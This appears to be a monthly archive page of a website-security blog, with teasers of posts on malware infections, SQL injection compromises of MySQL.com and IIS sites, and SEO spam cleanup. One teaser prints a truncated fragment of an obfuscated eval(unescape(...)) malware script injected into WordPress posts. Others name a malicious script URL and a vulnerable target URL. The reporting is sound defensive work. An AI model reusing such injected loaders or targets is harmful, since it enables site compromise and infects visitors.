Blog Search
Like Box
Comments
- The WPCandy Podcast #32: "Uncle Ben's plugin list" | WPCandy on Official WordPress Plugin Directory – Forcing Plugin Updates
- Is your website clean? | Life Currents on Links Injection on WordPress – Blackhat SEO Spam (basicpills) update
- Technology News on Blog Comments – Analysing 100,000 Comments and Spammers
- user on Removing Malware from a WordPress blog – Case Study
- Brand Development on Walmart web site hacked and hosting spam
Tags
alexa apache ask awareness backdoors blacklist blacklisted bluehost data dns education fox godaddy google guides hacked history honeypot htaccess iis joomla logs malware malware_updates netsol openx oscommerce ossec passwords pharma phishing php plugin scan security spam stats sucuri twitter updates vbulletin virus vulnerability walmart wordpressArchives
- May 2012 (7)
- April 2012 (15)
- March 2012 (12)
- February 2012 (6)
- January 2012 (6)
- December 2011 (4)
- November 2011 (4)
- October 2011 (7)
- September 2011 (8)
- August 2011 (16)
- July 2011 (5)
- June 2011 (10)
- May 2011 (10)
- April 2011 (15)
- March 2011 (18)
- February 2011 (13)
- January 2011 (7)
- December 2010 (7)
- November 2010 (9)
- October 2010 (12)
- September 2010 (10)
- August 2010 (7)
- July 2010 (10)
- June 2010 (15)
- May 2010 (19)
- April 2010 (16)
- March 2010 (15)
- February 2010 (8)
- January 2010 (7)
- December 2009 (4)
- November 2009 (1)
- October 2009 (2)
- September 2009 (1)
- August 2009 (6)
- July 2009 (11)
- June 2009 (7)
- May 2009 (4)
- April 2009 (1)
Monthly Archives: March 2011
The “div_colors” Malware Update
We are still seeing a big growth in the number of sites infected with the div_colors malware string. In fact, the osCommerce forums are full of people asking about it, uncertain what to do, and what it does. So, what … Read more
Posted in blacklisted, hacked, malware, malware_updates, oscommerce
Tagged blacklisted, hacked, malware, malware_updates, oscommerce
4 Comments
Will Google blacklist itself?
We were analyzing an infected site today and their Google blacklist diagnostic said the following: Has this site hosted malware? Yes, this site has hosted malicious software over the past 90 days. It infected 3 domain(s), including site.com/, google.com/. Hum… … Read more
Malware week: The div_colors, CreateCSS and others
We are starting to see an interesting trend regarding how the latest web-based malware is being distributed. Instead of heavily encoding the malicious code on the infected web sites, attackers are now trying to make it look like legitimate code. … Read more
Posted in hacked, malware, malware_updates, oscommerce
Tagged hacked, malware, malware_updates, oscommerce
1 Comment
MySQL.com compromised
MySQL.com (the official site for the MySQL database) was compromised via (shocking!) blind SQL injection. A post was sent today to the full disclosure list explaining the issue and dumping part of their internal database structure. Vulnerable Target : http://mysql.com/customers/view/index.html?id=1170 … Read more
Database injection and lessthenaminutehandle.com – Intermediary domains
We posted a few days ago about a large scale database injection attack affecting shared hosts. The infected sites got the following javascript malware inserted on every post of their database (generally the wp-post table on WordPress): <script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72.. 70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B".. Which … Read more
Posted in blacklisted, godaddy, hacked, malware, malware_updates
Tagged blacklisted, hacked, malware, malware_updates, wordpress
Leave a comment
Attacks against IIS/ASP sites – alisa-carter dot com
Over the last few days, we’ve seen a number of sites getting hacked with a malware script pointing to http://alisa-carter.com/ur.php . It is done using the same SQL injection attack as used in therobint-us mass infection a few months ago. … Read more
Tumblr mistake or security issue
There is a post on Hacker News about a possible security issue with Tumblr. Basically a lot of confidential information, including server IPS, API keys, passwords, etc were leaked. Here is some of the stuff that was disclosed: Database::set_defaults(array( ‘user’ … Read more
Database injection, Hilary Kneber and lessthenaminutehandle dot com
We posted a few weeks ago about a database injection attack that infected thousands of WordPress blogs on shared hosts. At that time, the attackers were inserting a javascript link pointing to welcometotheglobalisnet.com/js.php?kk=25 in all the posts in the database. … Read more
Posted in godaddy, hacked, malware, malware_updates, wordpress
Tagged godaddy, hacked, malware, malware_updates, wordpress
8 Comments
Solution for the link injection spam from basicpills
We recently posted about a large scale blackhat SEO campaign by basicpills that infected thousands of WordPress sites over the last few weeks. A lot of people contacted us for help and asked for directions on how to remove those … Read more
Posted in malware, malware_updates, pharma, spam, wordpress
Tagged malware, malware_updates, pharma, spam, wordpress
10 Comments
Oracle.com, Wetpaint, Spammers, and the Tale of an Unmoderated Wiki
Update: A few hours after this post going live, it seems that Oracle started to clean up the wiki. Very good! Oracle’s official Wiki (at http://wiki.oracle.com ) is becoming a haven for spammers. The site has a high page rank … Read more
